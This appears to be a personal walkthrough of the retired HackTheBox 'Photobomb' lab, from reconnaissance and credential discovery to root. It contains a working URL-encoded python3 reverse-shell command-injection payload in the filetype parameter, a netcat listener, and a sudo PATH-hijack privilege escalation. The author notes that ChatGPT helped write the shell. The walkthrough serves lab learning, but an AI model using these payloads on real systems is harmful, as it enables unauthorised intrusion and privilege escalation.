HTB | Photobomb | Walkthrough

The HTB — Photobomb Machine is rated as easy. As I am a very beginner, I think the difficulty level is accurate.

Easy Box, good for beginners, writeups already available,
Box retired in February 2023

About the Box

Reconnaissance

As usual I started with active reconnaissance against the given target.

nmap -sC -sV 10.10.11.192

This gives us some interesting feedback.
In total nmap finds only two open TCP ports:
- SSH (22)
- HTTP (80)

Web Enumeration — TCP — Port 80
We will start with the inspection of Port 80, while doing some web enumeration.

Opening 10.10.11.192:80 in the webbrowser gives us back an error.
Therefore we are adding the domain-name in our /etc/hosts file.

sudo nano /etc/hosts

General Impression
A website about photoshop. Not much to see on the main page, except a Login page. But basic standard credentials do not work.

Basic Enumeration
Robots.txt File — Gives us back a strange site:

sitemap.xml — Gives us back a similar site as the robots.txt file.
curl website — Gives us nothing very interesting back.
Inspecting Website — Here we found something interesting in the Debugger Register. A JavaScript Code that gives credentials for tech supporters who forget their login-data.

We then copy the “href” URL Cookie: http://photobomb.htb/printer into the Browser and receive the following message:

Once pressing the Button “OK” we are seeing a new page. The found Cookie is now stored in the Cookies Section. We are logged in with the tech-supporters pre-built Cookie-Credential. Now we can see the below new page, called /printer:

This page lets us Download Pictures with either file type JPG or PNG in different sizes.

I inspected the /printer page in more detail but found nothing interesting. While looking at the page sourcecode, I received again a pop-up message to confirm my credentials:

But again, nothing interesting is found in the source code itself.

So we go back to have a look at the printer side and try to capture the Download Traffic using Burp Suite.
(If you are using BurpSuite for the fist time, follow this guideline to set it up in Firefox: Configuring Firefox to work with Burp Suite — PortSwigger).

1. Open up BurpSuite, navigate to register “Proxy” and turn on the Intercept.
2. Navigate back to the photobomb.htb/printer page and press the Download-Button.
3. Go back to the BurpSuite and see if the Download-Request has been captured:

Exploit

1. We can see that there is a filetype parameter. We will try to inject our reverse shell code in there. For that, use the Button “Action” and send the captured request to the Repeater.
2. Before we implement our shell code, we will first set up our Netcat Listener to catch the reverse shell: nc -lnvp 9001
3. I tried using a bash shell, but that didn’t work. Therefore I am trying to use a python3 reverse shell.
   (I used ChatGPT to help me build the needed shell.)

filetype=png%3bexport+RHOST%3d"10.10.xx.xx"%3bexport+RPORT%3d9001%3bpython3+-c+'import+sys,socket,os,pty%3bs%3dsocket.socket()%3bs.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))))%3b[os.dup2(s.fileno(),fd)+for+fd+in+(0,1,2)]%3bpty.spawn("sh")'&dimensions=3000x2000

Make sure to change the IP-Address to your Machines-IP and the Port-Number needs to match your Listener. (yellow-marked parts)

We can then hit the “Send” Button.

The Repeater starts to not give back a response which is a good sign!
Wait a few more seconds and we got the Shell! :D

We will then make the shell more stable using the following code:

python3 -c 'import pty;pty.spawn("/bin/bash")'

We can see now that we are having a shell as the User Wizard.

User Flag
Now we can capture the user.txt flag. Firstly navigating back to the home directory. In here we can see with the command ls, that the user.txt file exist. The command cat user.txt will print us the user flag.

Privilege Escalation

First we want to see what kind of sudo rights we have.
(Sudo allows the user to have root privilieges when needed).
sudo -l

We then see that we have elevated privilege rights to /opt/cleanup.sh file

Lets have a look what that program includes:
cat /opt/cleanup.sh

Based from the written text we know now, where the photobomb.log files are stored. We can also see that the location is not using an ‘absolute path’. Therefore we can take the advantage of ‘binaries’ or ‘traverse path’ approaches. Lets see if we can find something interesting in those logs with the “find” binary.

1. Navigate to folder /tmp
2. echo bash > find
3. chmod 777 find
4. sudo PATH=$PWD:$PATH /opt/cleanup.sh

Root Flag:
To get the Root Flag navigate to cd /root. In there the root.txt file is located. Use the command cat to print out the content of the root flag.

And that is Done! :)
Thank you, for following along my walkthrough. I hope it was helpful.